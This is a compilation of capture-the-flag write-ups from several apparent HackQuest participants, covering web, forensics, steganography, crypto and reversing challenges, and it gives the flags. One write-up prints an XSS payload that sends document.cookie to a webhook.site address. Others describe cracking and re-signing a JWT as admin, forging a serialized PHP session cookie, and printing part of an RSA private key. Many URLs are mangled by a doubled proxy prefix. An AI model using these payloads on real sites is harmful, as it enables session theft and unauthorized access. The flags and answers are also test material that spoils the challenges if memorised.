Challenge 1: Miss Magic

Point: 100

The objective of this challenge is to find a way to fix the given corrupted file and find the flag in it.
the give file is seemed to be an image file of PNG type but file is corrupted and the image viewer
software failed to recognize the file as an image. when opening the file in an hexeditor and analyzing
it. I found out that the file signature that describes the type of file also known as magic bytes is
mismatched.

Based on the extension of the file I googled the magic byte of PNG file which is: 89 50 4E 47 0D 0A
1A 0A in hex, after replacing the bytes with correct ones this file is fixed and opening it in an image
viewer gives the flag: HQ8{b1beaf412f0a738590c464e79b3baab2}.

Challenge file after fixed reveals the flag.

Challenge 2: Trusting Response

Point: 100

This is web exploitation challenge where a website is given and few username password
combinations are present in the code. one of them is “user:user” by using this combination logged
into the challenge site successfully. after some enumeration i found some interesting keywords
like admin, user in the javascript file. with the words we can assume that those words are related to
user roles or special permissions.

Once i started analysing the website’s traffic I found out that on initial loading the site make a
request to an API endpoint “/api/currentuserrole”, which returns the role as user. on changing the
role from user to admin the site immediately displays the
flag: HQ8{9c1b7e435cff855b7f478ccf12fbda6c}.

Challenge 3: Search Shenanigans

Point: 100

This challenge provides us with a website with searching functionality my initial thought was it could
be something related to SQL injection since the site gets the input from the user and returns a list of
vulnerablities and it’s description, matching the user input, so I thought about SQL injection but any
common SQL injection payload simply doesn’t work.

After sometime playing around with the application I noticed the behaviour of the application which
reminds me about regex (Regular Expression) because if i search for “sq” as the input then it returns
all the data that contains the letter “sq” in it. So I thought this could be using regex under the hood
so by simply providing “*” in the input it returns a regex error. with this I confirmed that it is using
regex to retrieve the data. to get the flag I used the following payload: “f*” and it returns the
flag: HQ8{3212047ddc9c0960d61a9fb3b39cf9d4}

Challenge 4: Cloak and Dagger

Point: 100

A zip file including TLS certificate and key file is provided. Initially I have no idea about TLS
Certificates after researching about them on the internet I found out that I can read the contents of
the certificate file using the following command:

openssl x509 -in <certificate_file> -text -noout.

Upon inspecting the output of the command, I found the Flag in the CN field of the output.
Flag: HQ8{a9564ebc3289b7a14551baf8ad5ec60a}
Challenge 5: Deceptive Mayhem

Point: 200

This is also one of the web category challenge. we are provided with website that looks like a Blog
page. Let’s consider the Challenge domain as challenge.com upon inspecting the site and any
attempt to visit random page in that site results with a 404 not found and with an animated image
of a girl cutting an onion this images holds the hint of .onion sites. upon inspection the traffic of the
site. I noticed that on loading the site’s URL “challege.com/” it first gets an empty html page with a
javascript code. and it immediately redirects to the blog page “challenge.com/home.html”. So I
started the burpsuite and capture the initial javascript code that loads on the first loading page.

Javascript Code:

//Attempt to load hidden website

fetch(‘http://t6hkhyxxldx7psi2c3gjzukvkfvieonzan2ocxx3fh3gil2ymwwwjbid.onion/', "{method:
‘HEAD’}")
.then(response => {
// If Ok
if (response.ok) {
window.location.href =
‘http://t6hkhyxxldx7psi2c3gjzukvkfvieonzan2ocxx3fh3gil2ymwwwjbid.onion/';
}
else {
// If !OK
window.location.href = ‘home.html’;
}
})
.catch(error => {
// Somthing is not OK
window.location.href = ‘home.html’
})

The above code attempt to make a request to the

url http://t6hkhyxxldx7psi2c3gjzukvkfvieonzan2ocxx3fh3gil2ymwwwjbid.onion/ with HEAD method,
if response is OK(200) then it redirects the user
to http://t6hkhyxxldx7psi2c3gjzukvkfvieonzan2ocxx3fh3gil2ymwwwjbid.onion/

if the request is failed it redirects the user to home.html path which is our normal blog page. Note
that the URL the javascript code attempting to make request is an .onion site. Which means we an
only access this site through TOR network.

So I quickly spin up my Kali Linux VM and connected to the tor network using the tor browser,
Visiting the challenge.com from the TOR browser takes us to the .onion site mentioned in the code
which gives us the Flag: HQ8{a6471162999e92c79db70e11e7e9cd6e}.

Side by side comaprison of challenge site from TOR and normal broser.

With this round 1 got over and I made a detailed report on the challenges and solved and challenges
I attempted and uploaded on the portal and completed round 1.

Round 2:

After 10 days of completion of Hackquest Round 1, I received an email with a message of I made it to
round 2 of the competition. So prepared for round 2 and the day has finally come! Round 2 consist of
5 challenges in which i managed to solve 2 challenges. unlike round 1 which includes challenges from
many categories, round 2’s challenges are highly focused on Web exploitation category and it
is proctored round which means you are connected to a group meeting on teams with your
webcam(always) and microphone(whenever needed) ON. During the competition we are constantly
monitored even some of the participants and were caught and disqualified by the invigilators.

Challenge 1: Token Tango

Point: 200
A website is provided for us in this challenge. After inspecting the site I found a JWT token with fields
like iat, role, exp in the cookies of the site. So I started test JWT token based vulnerabilites but
nothing works after that I tried to crack the secret key that is used to sign the token
using JWT_TOOL tool and rockme.txt wordlist which results in Success! I managed to find the secret
that is used to sign the JWT token. with this I changed the role from user to admin and resigned the
JWT token and sent it to the server on the next request to retrieve the
Flag: HQ8{e5052b56dd93e775ba76108f87003306}.

Challenge 2: Kohraa

Point: 100

This is very simple Challenge as it’s only goal is to fix the broken QR code and scan it to find the Flag.
But unfortunately due to time constraints and my system issue I couldn’t submit the flag for this
challenge, which is considered as not completed on the organisation side. The give QR code is:

Broken QR Code
Just by Adding the Missing Position marker on the QR we can retrieve a sequence of numbers as
output.

Fixed QR Code.

QR Code output: BEGIN:VCARDVERSION:3.0N:Kohraa;TEL:110 121 70 173 62 145 60 63 66 145 143

142 61 67 67 145 60 146 67 63 62 142 143 142 143 61 142 60 71 70 64 146 146 145 142 144
175END:VCARD

From the output we can see that this is a vcard data with name as Kohraa and phone number as 110
121 70 173 62 145 60 63 66 145 143 142 61 67 67 145 60 146 67 63 62 142 143 142 143 61 142 60
71 70 64 146 146 145 142 144 175.

From observing the given number sequence we can say that this is Octal number (Base 7) since the
digits in the number are limited to 7 we can decode this to ASCII string using online tools available.

Decoded output (Flag): HQ8{2e036ecb177e0f732bcbc1b0984ffebd}

-------------------------------------------------------------------------------------------------------------------------------------
Round 1

Demolition Derby — 200

I opened the file in my kali and gave file command and it was ELF file so opened it in Binary Ninja and
IDA.
I used both because It is easier to view pseudo c in binary ninja and graphical view is better in IDA.I
checked the password strength function and got the flag where looking into the hex view in IDA. I
checked for the flag strength and when entering the correct flag it gave you found the flag.
Code de Tour — 100

Given Description: Bienvenue to our Cyber Security CTF challenge! Preparez-vous for an exciting
journey into the world of binary reversing. Explorez the intricacies of function calls as you unravel the
secrets hidden within. Embracez the challenge and showcasez your skills in this thrilling adventure.
Pouvez-vous déchiffrer le code and discover the flag? Bonne chance, mes amis! Let the cyber
exploration begin!

Photo by FlyD on Unsplash

I opened the file in my kali and gave file command and it was ELF file.
I found it was RC4 encoded and used dcode fr website to decrypt the encoded text with secret key
which found while navigating through the functions.

s1mpl3p4ss -KEY
e6c7bead19a7b55225aa9beddebb26253fd78eee2a4ae1d64d52a07afcc7e3c7 -MESSAGE

Optimus Prime — 100

Given Description:
Join forces with Optimus Prime in an epic cyber quest! The fate of this world hangs in the balance as
he seeks to crack the enigmatic pieces that hold the key to opening a portal. Your mission, should
you choose to accept it, is to assist Prime on his intergalactic journey. Unleash your inner hacker,
solve the puzzle, and help Prime reach his planet. The universe awaits your cyber prowess!
Source: https://www.pikpng.com/

1. I tried the RSA algorithm since the challenge.txt file contains n,e and c.

2. I used the dcode fr to decode the RSA CIPHER.

3. Which gave me flag as HQ8{c03a8384a71a8e6c566021ed5ca7ec7b}

n=
64064959164923876064874945473407049985543119992992738119252749231253142464203647
51877745547510997258168473262107299889806672830343330058529152758297943027635778
76340268691160953915143111111742063951958176727373208372403649446099798446019862
21462845364070396665723029902932653368943452652854174197070747631242101084260912
28784928664469958229247315266000403533061614901649695701294883303893171194398456
30357848051934749211646250684688429279053142689421537200786809373453651211294043
84633019183060347129778296640500935382186867850407893387920482141216498339346081
106433144352485571795405717793040441238659925857198439433
e = 65537
c=
62499128160674246865112556259067996535673898800996169762071753340863103122022196
05753552964777131581907276429364704840428034730643882542816475303857832594919910
63551475221829596568142396740158474010222153561829432268054063570529007669985018
00092513173442030724147024073540862241857597668353823399082112221312098864502870
75719367939944030523977609079943917609802872591924297949057530192587647996249109
13874265204976564044748023683370088781091554730814656762328623399852803156487561
44562560895303165402166794913042644971338368377316208854310612918148321369100509
730743693323731518463628753240663535664957563289124804816

The Rivest-Shamir-Adleman (RSA) algorithm is a public-key encryption algorithm that uses

asymmetric encryption to encrypt and decrypt data.

Deceptive Mayhem — 200

Given Description: A key piece of information that sheds light on the activities of threat group
“Lahasun_Pyaaj” is concealed within a seemingly benign website. At first glance, the site reveals a
clear static facade, luring unsuspecting visitors into a false sense of security. However, the true
machinations of “Lahasun_Pyaaj” unfold in a hidden forum accessible only through the special
powers. Your mission is to decode the dual nature of the digital labyrinth, exposing the group’s plans
to hack and leak breaches. Delve into the shadows, extract critical information, and thwart their
nefarious schemes before it’s too late.

I first opened the website and it has nothing interesting and I read the description again and found
the word “Lahasun_Pyaaj” I searched google what is that I found as garlic onion which refers to
onion that means there is something in the onion website and also it has hint “hack and leak
breaches” that means only if found onion link I can proceed further.

I tried to login in the website and it gave me “There is onion in your code” then only I tried visiting
http history in burp suite and got the flag and submitted.
I intercepted the request with Burpsuite and viewed the HTTP History and found the onion url and I
opened in TOR BROWSER and found the Leaked password database where I found the flag.
Round 2

Request tracer-100

Challenge Description:
Behind the user-friendly interface of every web application lies a complex
tapestry of digital communication. This communication occurs through a
series of silent requests and responses, governed by a hidden language
that ensures the smooth operation of the application. Explore the intricate
pathways that govern the methodical flow of information. Navigate the
unseen mechanisms that shape the X-change between client and server.
Uncover the secrets of communication protocols and the vital components
that govern their behavior.

I website has drop-down option with traceroute button for four different sudomains for tcs website
and I displayed the traceroute for the website with “*” and I could not infer anything from there then
I read the source code and took the JWT Cookie and decrypted it and found the user as GUEST and
requested a request in repeater in Burp-suite and I found response as PATCH Method supported and
I again requested with Patch method and found the flag.
OFFICE LEAKS -200

Challenge Description:
Amidst Silicon Valley’s tech frenzy, an innocent photo captured a sensitive
document on a screen. Panic ensued as the photo went viral, but Arvind, a
cybersecurity whiz, stepped in. Using his expertise, he tracked down the
leaked document and identified the culprits. Regrettably, the leaked image
continues to circulate on the internet, and we have successfully obtained a
copy. Your task is to uncover the sensitive content that was inadvertently
disclosed and make a report on the damage caused due to the leak.

Photo by Dan Nelson on Unsplash

First I analysed the image with file command and used exiftool and started doing image forensics and
also thought some file would be hidden and used steghide and binwalk to extract the hidden content
and nothing found.
After that I used hxd editor and tried to refer magic bytes and also searched for similar challenges.

I referred this article from internet https://cyberhacktics.com/hiding-information-by-changing-an-

images-height/

I thought the image is not in its complete portion after reading the article and rendered the image
I uploaded the image in cyberchef and imported To hex and copied the hex values. After that I
inputed that Hex values and modified the values from
ff c0 00 11 08 05 f5 05 39 to ff c0 00 11 08 09 f5 05 39

05->09 in the 6th position of this.

After completing the CTF. I solved another challenge and I solved the QR Code challenge.

KOHRAA -100

Challenge Description:
Embark on a digital journey through the haze of our Blurry Enigma Hunt!
Someone intentionally blurred this image, challenging you to sharpen your
skill and uncover the hidden treasure. The missing piece holds the key, and
once you have pieced it together you need to uncover the message within
the blurry landscape.
There was a broken QR-Code we need to fix it to get the flag and after analysing the qr code I found
the left Box was missing and cropped the box using online phone
editor https://www.iloveimg.com/photo-editor
and and attached there
After scanning I got the message.

BEGIN:VCARD
VERSION:3.0
N:Kohraa;
TEL:110 121 70 173 62 145 60 63 66 145 143 142 61 67 67 145 60 146 67 63 62 142 143 142 143 61
142 60 71 70 64 146 146 145 142 144 175
END:VCARD

I used Cyberchef and From Octal and got the flag

--------------------------------------------------------------------------------------------------------------------------------------
Challenge No 1: I am Always…

Flag: hq5{w1nn324v3n932}

Points: 100

Description: Relating the anger issues of hulk with the hidden flag.

Solution/Approach :

1. As we all know, Hulk is the strongest avenger, it immediately made sense to go with his
image details, also I compared him to other avengers to double-check.

2. I EXIF-ed the data from it and found that it had some file location (directory/path).
3. Then I just entered the main domain followed by the path I received in the directory url format.
(tcshackquest.com/avengersassembleathackquest)

4. And then finally, I found the main flag required.

Challenge No 2 : DigiMagic (This challenge was removed after sometime)

Flag: hq5{s0_Y0u_KN0WHoW$$1_worKs}

Points: 100

Description: The hint was in the challenge title itself : Digital Certificates are a thing.

Solution/Approach :

1. In this, I noticed that in the description it said digital certificates are necessary and it immediately
clicked that there might be something to do with the digital certificate itself.

2. Then by doing a NIKTO scan, I got details and followed the remote IP, it was something like 62.XX….
and by default it was using HTTP (insecure) protocol and it showed me a hint.

3. Then I studied the certificate and found a base 64 string hidden in the ISSUER section along with
other details as follows :
4. Finally, I decoded the base64 string and got the required flag, as follows :

Challenge No 3 : Reggie Rich

Flag: hq5{3nc2yp7*m45732}
Points: 100

Description: Matching PHP string using preg_match().

Solution/Approach :

1. In this, I noticed that in the source code, by using inspect element it said it used a specific pattern
using the php preg_match() function.

2. So I used, first the initial string in a prefix manner, then the original string, and string in the suffix
manner, like we get hackhackquestchampquestchamp as the magical string by referring to the below
function.

3. So, here we can say that Pattern1 was hack then Pattern2 was the original string and atlast
Pattern3 was questchamp .

4. Finally, after using the magical string, I got the flag as follows :
Challenge No 4 : Pandemic Inhibitor

Flag: hq5{HopeWeReturnToTheOldNormal}

Points: 400 (The only major challenge I got at that time)

Description: Vaccine manufacturers and POST requests were the only clues I got after reading it.

Solution/Approach :

1. In this, I got that we need to forward an API request externally, so I used postman for it as I had
basic knowledge of it.

2. I used the parameters given in tcshackquest portal, the main directory of API parameters by
locating to it. (below is the directory snippet)
3. Then I realized that I need to pass several parameters, like a SQL injection pattern.

4. Then, I used the earlier cookie, which we used for main login (for hackquest portal) as follows :

5. Finally, after the Covaxin value I got my flag and it showed me a doubtful warning when I used
Pfizer vaccine as the value like (will it really cure it?) #atmanirbharbharat

-------------------------------------------------------------------------------------------------------------------------------------
Challenge:- Alien Message
The given text is based64 because at the end of the string there is “==” symbol which is generally
used for the base64 padding.

txt msg

I use a $base64 command to decode the msg.

man base64

finding the msg

Decode msg a PNG file, and used any Qr decoder tool to find out the result.
Decode Msg

Challenge:- Lost Batman

The given file has no extension, so to find out which type of the file, use $file command(google
about magic numbers).

The file is a tcpdump we can use Wireshark to open this pcap file.

After doing a quick analysis I find out that the captured data is some sort of website.

To export, all the files GO to the File menu →Export Object →HTTP then save all.
There are many text and image files, and performing strings on joker.jpg gives us the flag.

Challenge Name:- Calling Charlie

Give file is .wav file, On listing, we found out that is the morse code and used an online tool to
decrypt it.
Challenge:- Reset Password

There is a login page that is used to update the password, which requires the old password. I simply
delete the element using inspect element., and submit the form.

There are many ways to do this challenge, we can use burp to capture the request and remove the
old password field.

Challenge:- Leaks and Leaks

The given description gives us the hint that it is realted to some sort of AWS or maybe aws key.

The given file is a git file. so we can find out all the previous commits and role back to find out what
are changes made.
git revert (Double tab to find out all the possible values ,fancy stuff :P)

after this revert command, it will open the commit file, which shows where the changes occur. in our
case .env file is modified.
we can use git revert 4811fc and cat .env which also gives the flag.

Challenge:- Excess Talent

Challenge gives the hint our request is seen by some special browser.
looks like some type of injection. so I started a ngrok server and send some payload. and after some
tries, I got the response.
On the left side, ngrok is running and on the right-hand side, we are listing from nc, in the left hand,
we got the flag in the user agent field.

------------------------------------------------------------------------------------------------------------------------------------
Web Exploitation

Strand Match

A login web application which asks for a user ID and flag itself.

It was a simple challenge to exploit string comparision of a PHP site. The site was a simple login form.
Request intercepted in Burp Suite

By simply making the Flag variable into the the array will simply give us the flag.

Adding square brackets to the Flag

Flag displayed in the alert

Agent 007
A simple company web page.

By simply checking out robots.txt file we get:

Checking out sitemap of the website also reveals some interesting endpoints:

Sitemap

devl0per.html is an interesting endpoint so I intercepted the web request and changed the User-
Agent to HQBOT
Crafted request

It returns a redirect which we follow with the same config gives us the flag.

Sassy Spaghetti

A web page which with Guest / basic priviledges.

Checking robots.txt gives an endpoint to the old version of the main website.
robots.txt

It had the source code clearly visible.

<?php
class User{
public string $name;
public string $role;
public bool $haveTicket;
}

$userobj=new User();
$userobj--->name="guest";
$userobj-&gt;role="Guest";

$ser_obj =serialize($userobj);
$cookiee=base64_encode($ser_obj);
if(!isset($_COOKIE["session"])){
setcookie("session",$cookiee,time()+86400*30,"/","",TRUE,TRUE);
header('Location: /check.php');
 }
?>;

<?php
if(isset($_COOKIE["session"])){
$resobj=unserialize(base64_decode($_COOKIE["session"]));
if($resobj--->name=="hqadmin" &amp;&amp; $resobj-&gt;role=="Administrator" &amp;&amp;
$resobj-&gt;haveTicket==TRUE){

echo "<img src="Flag.gif" width="480" height="auto" frameborder="0" allowfullscreen=""><br>";

echo "HQ7{404 Flag not found}";
}
else{
echo "<h2>You don't have Administrator role.</h2>";
echo "<img src="Ticket.gif" width="60%" height="auto" frameborder="0" allowfullscreen="">";
}}
?>

So simply crafting the PHP object using Burp Suit and base64 encoding it and sending it as a cookie
will get us our flag.

Manupulating Cookie

Miscellaneous

Nemo

A web application log file was given.

By simply searching for “HQ7” as it is the flag fromat, I discovered the flag as well as RCE endpoint.
Flag in reverse

Rorschach Test

A text file was given which had a lot of “Wahzaa !! ” string.

Simply by replacing “Wahzaa !! ” with empty string and some formatting we get the flag.

Onion Head

A pdf file was given.

PDF

Running strings on the file gave out some interesting hexadecimal block.
Hex block

Converting it to ASCII using CyberChef gave out a Zip file.

Zip file header “PK” clearly visible

Extracting it gave out flag.png

Forensics

Lure

A word file was given.

The extension was .docm the “m” stands for Macro enabled file. To extract macro code, I
used olevba .

Obfuscated VBA Code

To deobfuscate code I simply replaced invoke expression command

with ActiveDocument.Content.InsertAfter Text:= which basically, prints the output to the word
document file. I used inbuilt macro editor in Microsoft Word to execute the script.
Microsoft Word inbuilt Macro editor

It gave out a huge string of base64 encoded string.

Output as Base64 encoded string

I used CyberChef to decode the base64 string which gave out a PowerShell script.
Obfuscated PowerShell Script

Again after decoding the base64 string I got the main PowerShell script.

Main PowerShell script

The $mainInfo variable contains the flag in ASCII values.

Using PowerShell to print out the variable

Converting ASCII to Char using CyberChef

Shallot Discover

Docker repo folder was given.

Checking out JSON files gave the location for the flag.

One of the folders contained layer.tar archive which contained the file “.WhatsInside.txt” which had
our flag encoded using ROT13.

ROT13 encoded flag

Dull Drip

A git initilized folder was given which was of LinPeas.

I simply used git log command to check the logs an dfound an interesting entry. Then I used git
revert to rollback to the initial state.
Commits made to local repo

This gave out flag.txt

Reverse Engineering

Tokyo RE

The encrypted flag was given along with a python compiled file which had the logic for the
encryption.
Encrypted flag

I used uncompyle6 to decompyle the .pyc file.

Decompiled logic

I coded a python script to decrypt the flag.

flag = [72, 82, 57, 126, 55, 58, 128, 128, 103, 121, 61, 63, 134, 134, 139]
enc = []

for i in range(0, len(flag)):

enc.append(chr(flag[i] - i))

for k in enc:
print(k, end="")

Lame Rev

Another similar challenge to the previous one, this challenge was only up for few minutes for me
hence, I was not able to submit the flag on the portal.
Encrypted flag

Used uncompyle6 to decompile the python compiled file.

Decompiled python code for encryption logic

So, I wrote a python script to decrypt the flag.

l1 = [74, 82, 57, 124, 54, 109, 118, 52, 116, 111, 54, 117, 53, 96, 81, 113, 53, 115, 54, 117, 51, 112,
112, 126]
Encrypted = []
for i in range(len(l1)):
if i % 2 == 0:
Encrypted.append(chr(l1[i] - 2))
else:
Encrypted.append(chr(l1[i] - 1))

for k in Encrypted:
print(k, end="")

-----------------------------------------------------------------------------------------------------------------------------------
Challenge 1
Title: The Lost Batman
Points: 200
Description: Recover the stolen files of Batman.
Download File: https://bit.ly/2tfZwhB
Solution: The given file has no extension so we run `file` to determine the file type. We find out that
the file is pcap capture file so we open it with Wireshark. Followed HTTP Stream on joker.jpg which
yielded the secret key needed to unlock the flag.

Flag: hq4{Jai#Hanuman01}

Challenge 2
Title: Leaks & Leaks
Points: 200
Description: Plug the leaks!
Download File: http://bit.ly/36xSEus
Solution: Unzipped the given file and found .git directory. Used `git log` to find commit history and
found commit with title `Oops. Removing AWS key`. Used `git log -p` to get difference in commit and
found AWS Key. Used this AWS key to retrieve the flag.

Flag: hq4{#M-Seal#1lakh#}

Challenge 3
Title: Mobile Master
Points: 200
Description: The de“code” challenge!
Download File: http://bit.ly/2YLuOZo
Solution: Not Solved

Challenge 4
Title: Calling Charlie
Points: 100
Description: Roger the message!
Download File: http://bit.ly/38Dj3Zp
Solution: Given wav file contains morse code. Used Morse Code Decoder, decoding with threshold
value as 65 yielded JSDFHJKDSADK43 which was used to get flag.
Flag: hq4{hows!the!josh1}

Challenge 5
Title: Reset Password
Points: 200
Description: We have a new password reset functionality, is it secure though?
Solution: Captured the request for reset password in Burp suite and removed old_password
parameter from request which yielded the flag.
Flag: hq4{Iknowwtudidhq3}

Challenge 6
Title: WannaLaugh
Points: 300
Description: Time to laugh with WannaLaugh!
Download File: http://bit.ly/2YLuOZo
Solution: I couldn’t solve the challenge in time but I was able to un-compile the given executable to
its python source. This might be helpful for somebody.
Used python-exe-unpacker to unpack the WannaLaugh.exe, found `check` which was python
bytecode. Fixed the header (fixed check.pyc)and used uncompyle6 to get the source. From there
onwards it seems like a web challenge.

Challenge 7
Title: Excess Talent
Points: 300
Description: Send us the best jokes you have heard!
Solution: As the description states that we need to send developer jokes so it’s a hint that we need
to perform XSS. We use basic XSS payload
```<img src=x onerror=this.src=’http://webhook.site/40c5ae99-a46b-482e-a2ea-
005fb31c1c1d?c='+document.cookie>```
We make use of webhook to catch the request made by developer and find the flag in user-agent
Flag: hq4{Virat!Kohli!17}

Challenge 8
Title: Card Monster
Points: 300
Description: The credit card monster!
Solution: Card Monster expects Visa Card first which starts with 4 and has length 16, multiple times.
After Visa card the application expects Mastercard which starts with 5 and has length 16, keep
sending mastercard until the application yields the flag.
The task was automated with the help of requests module in python3.
solution.py
Flag: hq4{shrek+Betal+VISA1}

Challenge 9
Title: Alien Message
Points: 100
Description: A secret message received from outer space
Download: http://bit.ly/2LSfLaZ
Solution: The given message was base64, decoding lead to png file so used file descriptor to output
decoded stream in png file
Decoded png file was QR code, scanned to get secret and finally the flag.

Flag: hq4{They.will.come1}

Challenge 10
Title: Unlock Jarvis
Points: 100
Description: Find the key to unlock Jarvis
Solution: It was more of a puzzle than web challenge and majorly a nightmare for everyone. No one
was able to solve the challenge in round 1, which is why it came to haunt us back in finals too. The
idea was to get GPS co-ordinates of all the mentioned cities in the website, take the integer part of it
and type it into T9 keyboard. Once you have all the letters use it to unlock the flag.
Unlock Jarvis came as 300 point challenge in round 2.
--------------------------------------------------------------------------------------------------------------------------------------
1. Digimagic

Flag: hq5{s0_Y0u_KN0W_HoW_$$1_worKs}

This was the first task I solved. The name is interesting, isn’t it? From the name itself, I got the idea
that the task is somewhat related to Digital Signature.

In the task, we were provided a link. As soon as I opened the link an error page opened. The error
was related to certificates. I clicked on View certificate in the advanced options.
A web page opened which consisted of the certificate with the title tcshackquest.com. There was a
row called as Subject name and Issuer name. In that row, there was an option called Locality:
Bhubaneshwar. In front of it was a hash in the form of Xor. As I decoded the hash, I got the flag.

2. Record

Flag: hq5{Malware_implement_persistance}

This challenge was associated with log analysis.

On the task, there was a link given. Through this link, there was a file associated. After downloading
the file, I found that the file was zipped. I unzipped the file and now there were two files in that.

As This challenge was associated with log analysis. I analyzed both the files using Windows Event
Viewer.

On the event 7045, the Service name was looking suspicious. The service name was a hash instead of
plain text characters. After decoding the hash through the Base64 decoder I got the flag.

3. Life of Pie
Flag: hq5{Tiger*Zinda_hei}

Yes, you guessed it right. This is a famous movie. In the task, the question was asked that like “What
happens to the tiger at the end?”.

The task consisted of a webpage called lifeofpie.com. I took the URL and made the request via
Burpsuite. The irony is even the Burp was taking much time to load the content. There was a
noticeable response found called id=’link’.

This was a major clue. Here I go on and made the request 3 to 4 times. at last got the
response id=link which contains link href = ’/pinepineappleapplepie’. Then made a get request
to pinepineappleapplepie in the burpsuite and finally got the flag.

4. Reigie Rich

Flag: hq5{3nc2yp7*m45732}

There was a famous cartoon show called Richie Rich. Sounds similar, isn't it? This task was related to
PHP preg_match() function.

The first thing I did was to check the source code using inspect element. It said it used a specific
pattern using the preg_match() function.
The original string was hackquestchamp

I used the first initial string in a prefix manner. Then the original string and then then the remaining
string in a suffix manner. So now we got the magical string is
now: hackhackquestchampquestchamp. Pattern1 was hack, Pattern 2 was original string and Pattern
3 was questchamp.

Wait wait here’s the bonus…

The sole challenge which I managed to solve in Round 2(excluding GD)

Challenge name: It’s Exposed!

Flag: hq5{50m3*pu811c}

The challenge was related to data that gets publicly available.

In this challenge, there were two focus words in the description “licenepab” and “arcanehqdev”.
Notice that they were included with the double quotation mark. I first google the words without
quotation marks but nothing found fruitful. Then I googled the string “arcanehqdev” (with double
quotes).

I found two links. when I opened second link, I found a string on that webpage. I copied that string
and pasted it in Pastebin. Again I got the string which I pasted in the webpage which was part of the
challenge.
That’s It!

A-Pro tip: Documentation or Report creation and submitting it is super important. This is Ethical
hacking, without a report it will be called black hat hacking. Many participants solved challenges but
didn't create and submitted the report.

If you found this writeup useful share it with the Cybersecurity community. Hit that clap button so
that you will get the flag in the next CTF you will be playing.

Happy hacking!

------------------------------------------------------------------------------------------------------------------------------------
1.Metaverse

Given:Metaverse.zip

[p4ul@j0ker Metaverse]$ lsElephant.jpg getMeToReachTheHeight.zip

So Here We have zip file and JPEG , when unzipping zip file it contains 300+ directorys and JPEG may
contains some stegy information

1. Elephant.jpg

At The End of The Pic You can Notice The line `rot 18` something

[p4ul@j0ker Metaverse]$ exiftool Elephant.jpg |grep CommentComment : The

Elephant stuffed the 'banana' into its mouth as if he was hiding from us

Banana ,The password for steghide coz its jpg

[p4ul@j0ker Metaverse]$ steghide --extract -sf Elephant.jpg Enter passphrase: (banana)

wrote extracted data to "elephant_key.txt".[p4ul@j0ker Metaverse]$ cat elephant_key.txt
6ryrcunagfgrcngngvzr

if You Don’t Know The password , try Stegseek!

2. getMeToReachTheHeight.zip

$ unzip getMeToReachTheHeight
Are We going to the final directory Manually? no

[p4ul@j0ker Metaverse]$ seq 400|while read line;do cd getMeToReachTheHeight;done (Even With

huge Output)[p4ul@j0ker Metaverse]$ cp Tusks.docx /tmp/Metaverse

Output:

• Rot18 vs docx

$ file Tusks.docx
Tusks.docx: CDFV2 EncryptedAll We need is,Just a password to Open This file

6ryrcunagfgrcngngvzr = rot18

ROT18 Encrypter / Decrypter, Encoder / Decoder, Solver, Translator Online - DenCode

ROT18 is one of the single transliteration ciphers that encrypts by replacing the characters in the text
with other…
dencode.com

"1elephantstepatatime" , Give this string as password for docx

Give This Flag as Input and retrieve The original Flag

That’s all!

2. Secure Shell
Here’s the Filesystem Archive Zip , they wanted the RSA of the administrator!

1. Navigate

cd Datacenter-Prodserver/home/sysadmin/.ssh

2. Convert openssh into Rsa Pem :

[p4ul@j0ker .ssh]$ ssh-keygen -p -N "" -m pem -f id_rsaYour identification has been saved with the
new passphrase.[p4ul@j0ker .ssh]$ cat id_rsa|head-----BEGIN RSA PRIVATE KEY-----
MIIG4wIBAAKCAYEA5Qwf/+XGmVtO9OtjCyzE6/xtnywMFUY/MLZDCbItp06dtkXr
aRD3CYAj0vSsuNHlJwh6JK97ZaueTKqWy6MjZNHM1mAwsOjAOli/zGYqvfRJYN7+
mjeeZ7QAV7L0Tar3HX54KBLKH553rsPWhktF3hBdJsrtVhD+qgXETPP4yi1iJ/bt
QzccPBkd6IJF/T5xVrKozcUkWicT/Pq0+xY+w+6P3U7DJ7HAdKn5R8Dm9PY8c4tP
4bMt1h9GrgkGzWtlWiR3lxKcSE4q4D5x5lXiOc5wOnkM5A1RL1Fs41H9xEnZ0++9
/C11bpUM4TE/1Nuola5YZ9T4ZINkWXvv4sLaLzEWJOMazRDKvWSZRh/EfITho98z
2SSQhIIlKlGgajs/xhmq9bEQjxtbMb7LdmL67AWOC+RhFsT7l2A+jlWrAE/CDViv
Sxa5Zlw9ONraQCYiQbn3GbL0rhyGnfDloc9f2ySolfXV9hL9mjxnoJd5CIRX1LrY
u2t+uLHzgHzA4MODAgMBAAECggGAR65ZvV4NnyTiOugHoRGrtybSr8O7LFVFpVsE

3.Copy the Whole id_rsa file and paste it in a Challenge Site .

That’s All.

3. Into The abyss

Given File:

[p4ul@j0ker tmp]$ file iamasimplefile.mp3 iamasimplefile.mp3: MPEG ADTS, layer III, v1, 64 kbps,
44.1 kHz, Monaur

Analyzing the Morse code was waste of time! , just get into extract some deep hidden information
 1. unzip, foremost, deepsound, binwalk : Use Any one of these tools to extract the hidden file :)

[p4ul@j0ker tmp]$ unzip iamasimplefile.mp3 Archive: iamasimplefile.mp3warning

[iamasimplefile.mp3]: 971963 extra bytes at beginning or within zipfile
inflating: millionmiles.txt [p4ul@j0ker tmp]$ cat millionmiles.txt
